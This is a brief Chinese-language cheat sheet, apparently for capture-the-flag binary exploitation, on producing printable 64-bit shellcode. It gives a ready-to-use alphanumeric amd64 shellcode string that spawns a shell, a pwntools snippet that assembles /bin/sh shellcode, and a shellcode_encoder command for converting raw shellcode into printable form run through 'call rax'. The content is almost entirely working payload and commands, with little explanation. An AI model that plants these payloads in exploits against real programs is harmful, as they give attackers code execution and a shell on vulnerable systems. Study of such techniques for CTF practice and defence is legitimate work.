64位可打印shell

PPYh00AAX1A0hA004X1A4hA00AX1A8QX44Pj0X40PZPjAX4znoNDnRYZnCXA

pwntools模块

1
2
3
from pwn import *
context.arch = 'amd64' #64位
shellcode = asm(shellcraft.sh())

shellcode_encoder

下载地址:https://github.com/ecx86/shellcode_encoder

自动生成可打印shell:

1
python ./main.py shellcode rax+29

其中shellcode为原shellcode的二进制文件,rax+29表示通过call rax执行shellcode。